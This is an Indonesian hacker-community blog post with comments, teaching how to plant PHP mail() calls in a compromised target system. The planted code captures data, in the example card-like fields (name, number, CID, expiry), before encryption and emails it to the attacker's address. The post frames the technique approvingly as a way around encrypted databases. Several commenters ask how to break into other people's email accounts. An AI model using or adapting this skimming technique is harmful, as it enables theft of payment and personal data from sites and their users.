Home / Coding / Email Logging Information
black-hat-logo

Email Logging Information

Apa kabar semuanya 😀

Berikut ini gw mau jelasin trik yang sangat menarik buat anda pelajarin. Merupakan sebuah logging informasi data yang masuk, dan kemudian dikirim ke email kita. Ini sempet dibahas di BinusHacker Hack Show 30 Mei 2009 di #BinusHacker @Irc.Dal.Net

Lets begin!

Memaksimalkan Fungsi Email

= Hacking is Knowledge =

Tujuan dari memaksimalnya email pada topic ini adalah untuk logging informasi & data!

Pertama:

Kita menggunakan script PHP (Private Home Page)

Fungsi yang kita pake adalah mail();

Dimana pengiriman email dilakukan:

contoh:

<?php

// Contoh penggunaan

$Orangnya = “Budi Anduk”;
$NoId = “123456789”;
$CID = “234”;
$Exp = “10/2009”;

$Nama = “Nama Pengirim”;
$Emailnya = “email@pengirim.com”; // Email Pengirim
$Penerima = “emailanda@yahoo.com”; // Email Anda Sebagai Penerimas
$IsiEmail = “Berikut Ini Isi Log Data: “. $Orangnya .” “. $NoId .” “. $CID .” “. $Exp .” “; // Isi Email
$Subject = “Logging Data & Informasi”; // Judul Email
$Header = “From: “. $Nama . ” <” . $Emailnya . “>\r\n”; // Untuk Header

mail($Penerima, $Subject, $IsiEmail, $Header);
?>
Dari contoh di atas maka dapat kita simpulkan bahwa, kita bisa menggunakan fasilitas pengirim email untuk melakukan logging 🙂

Terkadang banyak file yang terenkripsi yang ada didatabase
Sehingga kita susah untuk melakukan decryptnya

Maka cara ini dapat kita gunakan..
Jika kita mendapatkan sebuah target dalam system,
dan disitu terjadi aktifitas pengiriman data ke database server dari client
Maka, kita dapat melakukan pengambilan data sebelum dilakukan encyption
Dengan cara menyisipkan variable” baru, yang bisa kita gunakan untuk menyimpan informasi & data
Kemudian kita kirim ke email kita tanpa terenkripsi sama skali..

Enak bukan? Hahahha.. That is the concept!

Silakan baca artikel, analisa script, silakan download dibawah:

Nah, untuk penjelasan lengkapnya anda bisa download tutorial dan ujicoba lengkapnya di:

http://www.indowebster.com/EmailLoggingHckShow.html

Untuk melakukan hasil contohnya, anda upload semua file ke sebuah hosting, kemudian praktekkan sesuai dengan contoh.

Jangan lupa ganti email pengirim menjadi:

<?

$Penerima = “emailanda@domainemailanda.com”; // Email Anda Sebagai Penerima

?>

Selamat mencoba! Semoga berhasil 😀
Enjoy & Eat it!
==================[EOF]===================

Dedicated to All Of You, Especially BinusHacker Member
Indepentent Hacking Community

About UtuH

Enjoy & Eat It!

Check Also

url-shortener-memperpendek-url-binushacker

Source Code URL Shortener 2 Versi – MiniUrlz

Halo kawan, ini postingan pertama saya di Binus Hacker, Disini saya akan share clone script …

20 comments

  1. keduax not pertamax
    mantab gan 🙂

  2. mantafff tuh….

    cuma tinggal edit dikit lagi makin maknyosss tuh trik nya

    THANKS for UTUh

  3. agan gondrong

    siip…!!!

    catat ah,,, di buku…
    biar bs d praktiin…

    makasih mas.

  4. Mau tanya dong, kalo kita biar bisa tau IP yang isi shoutmix kita yang kurang sedap , tapi dari mana asalnya ?
    Kalo di ban kan bisa aja, tp aku mau tau asalnya.
    Kalo pake http://www.geobytes.com/IpLocator.htm
    ato http://www.geobytes.com/IpLocator.htm.
    serasa kurang maksimal.
    kira2 ada ga ya caranya ?
    Thanks.

  5. soalnya setelah pakai arul , keluarnya seperti ini :
    IP address 116.66.205.1
    Hostname Not available
    ISP PT Cyber Network Indonesia
    Internet Service Provider
    Jakarta
    Country Indonesia

  6. maaf numpang nanya,.,.,.

    klo mau tembus E-mail orang pke kta kunci apa yah??????

  7. aku copy ya kk

  8. Martabak gan .. Maksudnya mantap gitu lho he he he …

  9. gwa msh agak bgung dgn pnjelasan nya…???

  10. di coba dulu ya mas…

    jangan lupa singgah ke tempat saya….

  11. Tuyul_maen_komputer

    Kok linknya mate sob ???
    waduuhh… padahal mau belajar tuh.

  12. Keren banget gan

  13. kak nama saya riando saya juga anak binus tapi masih kelas 10 , saya minta tolong bagaimana cara ngehack id yahoo soalnya id yahoo saya di hack sama orang bisa tolong kirimin e -mail ke e-mail saya?

  14. salam kenal,,,
    terima kasih atas infonya…
    di sini saya bisa memperdalam tentang IT…

  15. kk utuh . .q putra bru sdikit ngrti hack sh . . bisa g kasi tau caranya ngaktifin email yg dh g aktif lg . .cman q udah lupa code verifikasinya bisa mnta tlong g kk utuh . .???????? mslhnya tu pntg bget . .bisa g krim kn caranya ke emil saya . .??plissss

  16. Salam kenal,nama saya mul.saya ada masalah email gmail tidak bisa buka lagi,uda saya coba bermacam cara tetap ga bisa.gara2 email tdk bisa buka blog saya juga tdk terupdate lagi.bole ga saya minta tolong.
    Kalo sudah bisa tolong kirim ke email ini: mulia-80@hotmail.com
    terima kasih.

  17. Salam kenal, hai nama saya Dini Kozemake….
    Hmmm, sekedar info saja.
    Logging ini bisa diketahui darimana alamat asli pengirimnya dengan menggunakan fasilitas dari email itu sendiri. misalnya untuk yahoo bisa view full header.

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *